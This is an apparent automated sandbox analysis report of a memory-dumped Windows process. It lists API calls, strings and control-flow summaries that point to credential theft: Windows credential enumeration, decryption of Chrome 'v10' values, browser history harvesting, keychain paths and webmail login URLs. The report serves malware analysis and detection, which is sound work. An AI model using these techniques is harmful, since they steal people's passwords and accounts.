  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
• String ID: *.*$Apple Computer\Preferences\keychain.plist
• API String ID: 2263259095-3798722523

APIs
  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
• SetErrorMode.KERNELBASE(00008001), ref: 00412799
• GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
• EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 4165125987-2783969131
                                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Control-flow Graph

APIs
• memset.MSVCRT ref: 004091E2
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
• memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
• memcpy.MSVCRT(?,00000023,?), ref: 0040930C
• memcpy.MSVCRT(?,?,00000010), ref: 00409325
• memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
• memcpy.MSVCRT(?,00000015,?), ref: 00409357
• memcpy.MSVCRT(?,?,00000010), ref: 00409370
• memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
• memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Control-flow Graph

APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNEL32(00000000), ref: 0040E143
• CloseHandle.KERNEL32(?), ref: 0040E148
• CloseHandle.KERNEL32(?), ref: 0040E14D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: bhv
• API String ID: 4234240956-2689659898
• Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
• Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
• Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

Control-flow Graph

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
• GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
• GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
• GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2941347001-70141382
• Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
• Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
• Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
• Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
                                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                  Control-flow Graph

                                                                                                                   • Control-flow graph of the function starting at 0040E175 (rendered as an image in the report; the executed / not-executed colouring is not recoverable as text). Basic blocks, calls and successor edges:
                                                                                                                     • 704  40e175-40e1a1  call 40695d, call 406b90  -> 709, 710
                                                                                                                     • 709  40e1a7-40e1e5  memset  -> 712
                                                                                                                     • 710  40e299-40e2a8  call 4069a3  (no successors)
                                                                                                                     • 712  40e1e8-40e1fa  call 406e8f  -> 716, 717
                                                                                                                     • 716  40e270-40e27d  call 406b53  -> 712 (loop), 722
                                                                                                                     • 717  40e1fc-40e219  call 40dd50 (x2)  -> 716, 728
                                                                                                                     • 722  40e283-40e286  -> 725, 726
                                                                                                                     • 725  40e291-40e294  call 40aa04  -> 710
                                                                                                                     • 726  40e288-40e290  free  -> 725
                                                                                                                     • 728  40e21b-40e21d  -> 716, 729
                                                                                                                     • 729  40e21f-40e235  call 40742e  -> 716, 732
                                                                                                                     • 732  40e237-40e242  call 40aae3  -> 716, 735
                                                                                                                     • 735  40e244-40e26b  _snwprintf, call 40a8d0  -> 716
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                  • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                  • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                  Control-flow Graph

                                                                                                                   • Control-flow graph of the function starting at 0041837F (rendered as an image in the report; the executed / not-executed colouring is not recoverable as text). Basic blocks, calls and successor edges:
                                                                                                                     • 789  41837f-4183bf  -> 790, 791
                                                                                                                     • 790  4183c1-4183cc  call 418197  -> 796, 797
                                                                                                                     • 791  4183dc-4183ec  call 418160  -> 798, 799
                                                                                                                     • 796  4183d2-4183d8  -> 791
                                                                                                                     • 797  418517-41851d  (no successors)
                                                                                                                     • 798  4183f6-41840b  -> 800, 801
                                                                                                                     • 799  4183ee-4183f1  -> 797
                                                                                                                     • 800  418417-418423  -> 802
                                                                                                                     • 801  41840d-418415  -> 802
                                                                                                                     • 802  418427-418442  call 41739b  -> 805, 806
                                                                                                                     • 805  418444-41845d  CreateFileW  -> 807
                                                                                                                     • 806  41845f-418475  CreateFileA  -> 807
                                                                                                                     • 807  418477-41847c  -> 808, 809
                                                                                                                     • 808  4184c2-4184c7  -> 812, 813
                                                                                                                     • 809  41847e-418495  GetLastError, free  -> 810, 811
                                                                                                                     • 810  4184b5-4184c0  call 444706  -> 797
                                                                                                                     • 811  418497-4184b3  call 41837f (recursive)  -> 797
                                                                                                                     • 812  4184d5-418501  memset, call 418758  -> 819
                                                                                                                     • 813  4184c9-4184d3  -> 812
                                                                                                                     • 819  418506-418515  free  -> 797
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 77810686-1717621600
                                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                  • String ID: r!A
                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                  • String ID: BIN
                                                                                                                  • API String ID: 1668488027-1015027815
